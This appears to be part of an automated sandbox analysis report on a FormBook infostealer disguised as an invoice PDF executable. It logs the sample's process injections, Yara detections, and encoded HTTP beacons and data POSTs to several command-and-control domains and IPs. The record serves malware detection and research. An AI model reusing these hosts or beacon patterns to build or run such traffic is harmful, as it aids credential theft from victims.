                                                                            Dec 10, 2024 16:25:56.549738884 CET | 1191 | IN | HTTP/1.1 404 Not Found
                                                                            Server: openresty/1.19.3.1
                                                                            Date: Tue, 10 Dec 2024 15:25:56 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Content-Length: 982
                                                                            Connection: close
                                                                            X-Cache: MISS from kangle web server
                                                                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>404</title></head><body><div id='main' ><i><h2>Something error:</h2></i><p><h3>404</h3><h3><font color='red'>No such file or directory.</font></h3></p><p>Please check or <a href='javascript:location.reload()'>try again</a> later.</p><div>hostname: kangle web server</div><hr><div id='pb'>Generated by <a href='javascript: var code=404' >kangle/3.5.21.16</a>.</div></div><script language='javascript'>var referer = escape(document.referrer);var url = escape(document.URL);var msg = 'No%20such%20file%20or%20directory.'; var hostname='kangle web server';var event_id='';var aaaaaaa = ('<scr'+'ipt language="javascript" src="https://error.kangleweb.net/?code=404&vh=594445"></scr' + 'ipt>');</script>... padding for ie -->... padding for ie -->... padding for ie -->... padding for ie -->... 673800cf --></body></html>


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            29 | 192.168.2.5 | 50003 | 23.167.152.41 | 80 | 1400 | C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 10, 2024 16:26:03.454128027 CET | 782 | OUT | POST /4i55/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.06753.photo
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 208
                                                                            Origin: http://www.06753.photo
                                                                            Referer: http://www.06753.photo/4i55/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Data Ascii: UTJ0bhC=j2kY0Gia+gwBo8qt68aN1GhVV0t8PDfE1lO/0n/8eLJFf4yCgKmk/2mdYr85SoHeuMQi3uyWxp9MuBptkYl1mmL0lkV8uO8zUYMChCqwZuhbdGWoPitp0OtTrHYaMOBiyT2FhIIvLTn3/8mq+b7rRsyMDhAIyyKvVi8TAXY97LfFjbTbBbZNex3hBPp4+WVysvXL65w=


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            30 | 192.168.2.5 | 50004 | 23.167.152.41 | 80 | 1400 | C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 10, 2024 16:26:06.110238075 CET | 802 | OUT | POST /4i55/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.06753.photo
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 228
                                                                            Origin: http://www.06753.photo
                                                                            Referer: http://www.06753.photo/4i55/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Data Ascii: UTJ0bhC=j2kY0Gia+gwBqc6t9vyN9GhWMUt8azfA1lS/0kzseYtFfaqCy7mk82mdXL88WoHFuMVB3uOWxppMuB5tkvxqlWLMtEV+qO8zUYMChG74ZuJbc3GoOAVq5utQ6HYabeAryT3ihJUVLRf3//yq+Pv0YsyGMBBnjiTHcTUMf0hMl9rRvNixb5RlNRbZRchPvm0b2MH7kuns2d51ZyJu6WOpsHozBC7W


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            31 | 192.168.2.5 | 50005 | 23.167.152.41 | 80 | 1400 | C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 10, 2024 16:26:08.778256893 CET | 1819 | OUT | POST /4i55/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.06753.photo
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 1244
                                                                            Origin: http://www.06753.photo
                                                                            Referer: http://www.06753.photo/4i55/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            32 | 192.168.2.5 | 50006 | 23.167.152.41 | 80 | 1400 | C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 10, 2024 16:26:11.524070024 CET | 531 | OUT | GET /4i55/?Pt=fDlHoNWP0RBd&UTJ0bhC=u0M432eX/xZzvajH7Zn4oj16d1M/QQvp1keQ4HSaLqVhf5mFg72lw0bKX+EdY5KNk4RXhc2Czo9qgjxQ7/1U7lrsyz5+vZkdL+U3wCm0CZUZdVO/eyd7jrB+924QONEljg== HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.06753.photo
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            33 | 192.168.2.5 | 50007 | 178.79.184.196 | 80 | 1400 | C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 10, 2024 16:26:18.420305967 CET | 794 | OUT | POST /tgvj/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.gucciqueen.shop
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 208
                                                                            Origin: http://www.gucciqueen.shop
                                                                            Referer: http://www.gucciqueen.shop/tgvj/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Data Ascii: UTJ0bhC=Ex25adYtkqOBBEJfzwqQj0VKxWBZERTiBmiPPOFjovf7g1qPEXZV+PkcNx1L7QGNRQTC96v0qipWcUiNeDyom6g6UYwyKYnQuH/WccO0t42RB0k4EHHcxhFM7FDMdadJ0VWcPWfS0adq8BKaoQ0WdgCDli2grhX7cB4OuHF/FNLXmcRQt4pBUWECByy7oxgd9jyblc0=


                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                            34 | 192.168.2.5 | 50008 | 178.79.184.196 | 80 | 1400 | C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                            Dec 10, 2024 16:26:21.081820965 CET | 814 | OUT | POST /tgvj/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.gucciqueen.shop
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 228
                                                                            Origin: http://www.gucciqueen.shop
                                                                            Referer: http://www.gucciqueen.shop/tgvj/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.5 | 50009 | 178.79.184.196 | 80 | 1400 | C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 16:26:23.752264023 CET | 1831 | OUT | POST /tgvj/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.gucciqueen.shop
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 1244
                                                                            Origin: http://www.gucciqueen.shop
                                                                            Referer: http://www.gucciqueen.shop/tgvj/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.5 | 50010 | 178.79.184.196 | 80 | 1400 | C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 16:26:26.404894114 CET | 535 | OUT | GET /tgvj/?UTJ0bhC=JzeZZokphZySGFVIg3fW0H54lk8TDwrrWR2sEOIWidbOqUuKdhJmv9JQEF9O1RD5XyTbq6Omqzt9QHi6LTaoobUAF4YLNuHihjnBZMeTneWuYVNORWnArhJV2H75YPAzvg==&Pt=fDlHoNWP0RBd HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.gucciqueen.shop
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Dec 10, 2024 16:26:32.875821114 CET | 461 | IN | HTTP/1.1 404 Not Found
                                                                            Date: Tue, 10 Dec 2024 15:26:32 GMT
                                                                            Server: Apache/2.4.62 (Debian)
                                                                            Content-Length: 281
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.62 (Debian) Server at www.gucciqueen.shop Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.5 | 50011 | 45.79.252.94 | 80 | 1400 | C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 16:26:39.159554958 CET | 803 | OUT | POST /p39a/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.premium303max.rest
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 208
                                                                            Origin: http://www.premium303max.rest
                                                                            Referer: http://www.premium303max.rest/p39a/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Dec 10, 2024 16:26:40.405989885 CET | 399 | IN | HTTP/1.1 301 Moved Permanently
                                                                            date: Tue, 10 Dec 2024 15:26:40 GMT
                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                            cache-control: no-cache, must-revalidate, max-age=0
                                                                            x-ua-compatible: IE=edge
                                                                            x-redirect-by: WordPress
                                                                            vary: X-Forwarded-Proto,Accept-Encoding
                                                                            location: https://www.premium303max.rest/p39a/
                                                                            content-length: 0
                                                                            content-type: text/html; charset=UTF-8
                                                                            server: Apache
                                                                            connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.5 | 50012 | 45.79.252.94 | 80 | 1400 | C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 16:26:41.828942060 CET | 823 | OUT | POST /p39a/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.premium303max.rest
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 228
                                                                            Origin: http://www.premium303max.rest
                                                                            Referer: http://www.premium303max.rest/p39a/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Dec 10, 2024 16:26:43.018282890 CET | 399 | IN | HTTP/1.1 301 Moved Permanently
                                                                            date: Tue, 10 Dec 2024 15:26:42 GMT
                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                            cache-control: no-cache, must-revalidate, max-age=0
                                                                            x-ua-compatible: IE=edge
                                                                            x-redirect-by: WordPress
                                                                            vary: X-Forwarded-Proto,Accept-Encoding
                                                                            location: https://www.premium303max.rest/p39a/
                                                                            content-length: 0
                                                                            content-type: text/html; charset=UTF-8
                                                                            server: Apache
                                                                            connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.5 | 50013 | 45.79.252.94 | 80 | 1400 | C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 16:26:44.484082937 CET | 1840 | OUT | POST /p39a/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.premium303max.rest
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 1244
                                                                            Origin: http://www.premium303max.rest
                                                                            Referer: http://www.premium303max.rest/p39a/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Dec 10, 2024 16:26:45.675806999 CET | 399 | IN | HTTP/1.1 301 Moved Permanently
                                                                            date: Tue, 10 Dec 2024 15:26:45 GMT
                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                            cache-control: no-cache, must-revalidate, max-age=0
                                                                            x-ua-compatible: IE=edge
                                                                            x-redirect-by: WordPress
                                                                            vary: X-Forwarded-Proto,Accept-Encoding
                                                                            location: https://www.premium303max.rest/p39a/
                                                                            content-length: 0
                                                                            content-type: text/html; charset=UTF-8
                                                                            server: Apache
                                                                            connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.5 | 50014 | 45.79.252.94 | 80 | 1400 | C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 16:26:47.138627052 CET | 538 | OUT | GET /p39a/?Pt=fDlHoNWP0RBd&UTJ0bhC=NYM041vNjejJmgmdhSmYVhxa0+fvP9BrXtGCCHxlIJ8IspgLPDvRAlXhNJfLJHdGPUuKZVGM9QJ5KO5zmQZa2t3P5lFBsDeA2Uq7kE2QIl2fKsXQslF4XsSGUXNQZJSmUg== HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Host: www.premium303max.rest
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Dec 10, 2024 16:26:48.335143089 CET | 551 | IN | HTTP/1.1 301 Moved Permanently
                                                                            date: Tue, 10 Dec 2024 15:26:48 GMT
                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                            cache-control: no-cache, must-revalidate, max-age=0
                                                                            x-ua-compatible: IE=edge
                                                                            x-redirect-by: WordPress
                                                                            vary: X-Forwarded-Proto,Accept-Encoding
                                                                            location: http://premium303max.rest/p39a/?Pt=fDlHoNWP0RBd&UTJ0bhC=NYM041vNjejJmgmdhSmYVhxa0+fvP9BrXtGCCHxlIJ8IspgLPDvRAlXhNJfLJHdGPUuKZVGM9QJ5KO5zmQZa2t3P5lFBsDeA2Uq7kE2QIl2fKsXQslF4XsSGUXNQZJSmUg==
                                                                            content-length: 0
                                                                            content-type: text/html; charset=UTF-8
                                                                            server: Apache
                                                                            connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.5 | 50015 | 31.31.198.145 | 80 | 1400 | C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 16:27:02.812504053 CET | 806 | OUT | POST /rls3/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US
                                                                            Accept-Encoding: gzip, deflate
                                                                            Host: www.locuramagica.online
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Connection: close
                                                                            Cache-Control: max-age=0
                                                                            Content-Length: 208
                                                                            Origin: http://www.locuramagica.online
                                                                            Referer: http://www.locuramagica.online/rls3/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Dec 10, 2024 16:27:03.925805092 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                            Server: nginx
                                                                            Date: Tue, 10 Dec 2024 15:27:03 GMT
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Vary: Accept-Encoding
                                                                            Content-Encoding: gzip
                                                                            Data Ascii: 0oRhU'V9Uka~k1&IcKmbMp{g@%/c&XJz6(o#+"\y0&Y*H{]}b5Un1TxpsV5v|n:e3I?>IGRIw+lJzBg<aoEJF
                                                                            Dec 10, 2024 16:27:03.927364111 CET1236INData Raw: 87 6f 34 c6 a5 e3 ec af 2f ed 9d 1f 99 bf b3 af fe f0 c1 bc 5f 78 c6 ca f4 3b 2b 90 ff ef 6c 77 33 f7 1f 84 af d3 73 54 3c 04 c0 a0 b8 bd eb c8 ea d7 db c0 2d 2d 30 10 05 35 2c b1 cd 43 b6 82 7b 46 e8 1c b5 52 38 3a 91 77 e8 af 8e 2c df 2e 77 e3
                                                                            Data Ascii: o4/_x;+lw3sT<--05,C{FR8:w,.wK^t+YaV7y$0_;63B:W$;7cBUg+{o&XFwCeYz$Q{;_yZzrvvwwI W_/CUEMc5y&
                                                                            Dec 10, 2024 16:27:03.927381039 CET1236INData Raw: 58 21 2f 56 c8 8b 15 f2 62 85 b4 b0 42 b8 fc 16 c0 70 db 44 bc 91 91 db 6b aa d5 46 42 32 d5 2a b2 bc df 54 4b c2 a1 70 99 0a d6 d8 08 d2 ff d9 11 1f 84 af 25 95 93 14 f8 7c 40 d8 13 a0 f1 5a be 1e cf ae b7 92 9a be b9 58 cc 66 82 9c 89 f8 44 40
                                                                            Data Ascii: X!/VbBpDkFB2*TKp%|@ZXfD@$DQF 22,kpWKpn|!M\d;(c*)(1(!3smLQjU{7Ku@I,OQT&\;U?\0S#(U\Zq0wjO"7Udnyf/:
                                                                            Dec 10, 2024 16:27:04.045502901 CET1236INData Raw: bd 98 b4 6e 3e 92 ff 56 e0 e7 8b ff f6 09 f9 ec 05 b9 ac eb d6 5a b6 a4 29 2f ef f3 72 69 ff b2 fa bc b5 b4 57 47 74 f7 e8 f3 7c 44 77 fc df af cf 51 b9 f3 ca 50 7d 86 75 a5 b2 71 fe f4 ba bd 9d b0 d7 76 f9 e7 be 70 f3 a5 0e f3 96 94 7f 56 7d fe
                                                                            Data Ascii: n>VZ)/riWGt|DwQP}uqvpV}qaKN1@vK]-4:]]EkfkfrJuWpw_<YweHd3d'ICC@>yD@d{@vhi0h*NQP\aT>v


Session ID: 42
Source IP: 192.168.2.5
Source Port: 50016
Destination IP: 31.31.198.145
Destination Port: 80

Timestamp: Dec 10, 2024 16:27:06.158276081 CET
Bytes transferred: 826
Direction: OUT
Data:
POST /rls3/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Host: www.locuramagica.online
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
Content-Length: 228
Origin: http://www.locuramagica.online
Referer: http://www.locuramagica.online/rls3/
User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                            Data Ascii: UTJ0bhC=tlDMTCZIH9wZhvjParg5sLcImjWys31rQu6CEKfiMOzm3QJVryr02/ERPgpsE0dzJACTAQniiVxsGlnp3I+fjZ1bT3nk3VEeadXFC9UFC62Fydd3n4cUEG3zaEKCCd2fRIGP69xmYNauTSCpIPJfThDVanPFLiCN1GVFVMgs8F85pTVxDQItdx13Eg+VZ/DTnzszmy2alGcYQLRGWHwJ2cI8yuLZ
Timestamp: Dec 10, 2024 16:27:07.551311016 CET
Bytes transferred: 1236
Direction: IN
Data:
HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 10 Dec 2024 15:27:07 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Content-Encoding: gzip

                                                                            Target ID:0
                                                                            Start time:10:22:57
                                                                            Start date:10/12/2024
                                                                            Path:C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe"
                                                                            Imagebase:0x400000
                                                                            File size:983'498 bytes
                                                                            MD5 hash:809F3ED91D34D38F0ECED2A0709E22E9
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            Target ID:2
                                                                            Start time:10:22:58
                                                                            Start date:10/12/2024
                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe"
                                                                            Imagebase:0x670000
                                                                            File size:46'504 bytes
                                                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2353981080.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2353173694.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2354040519.0000000004800000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:4
                                                                            Start time:10:23:22
                                                                            Start date:10/12/2024
                                                                            Path:C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\qIZQqGQYNpAAyCSBbTrFRZEGXhIYhVuEnpOBfTEdxpgYSrDFPPC\fQbMdgFgKkVEm.exe"
                                                                            Imagebase:0x420000
                                                                            File size:140'800 bytes
                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4507703675.0000000006490000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4503127560.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            Target ID:5
                                                                            Start time:10:23:24
                                                                            Start date:10/12/2024
                                                                            Path:C:\Windows\SysWOW64\xwizard.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\SysWOW64\xwizard.exe"
                                                                            Imagebase:0x460000
                                                                            File size:55'808 bytes
                                                                            MD5 hash:8581F29C5F84B72C053DBCC5372C5DB6
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4501630605.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4502701769.0000000004C60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4502765838.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:low
                                                                            Has exited:false

                                                                            Target ID:7
                                                                            Start time:10:23:48
                                                                            Start date:10/12/2024
                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                            Imagebase:0x7ff79f9e0000
                                                                            File size:676'768 bytes
                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true


                                                                              Execution Graph

                                                                              Execution Coverage:3.3%
                                                                              Dynamic/Decrypted Code Coverage:1.1%
                                                                              Signature Coverage:3.7%
                                                                              Total number of Nodes:1694
                                                                              Total number of Limit Nodes:44
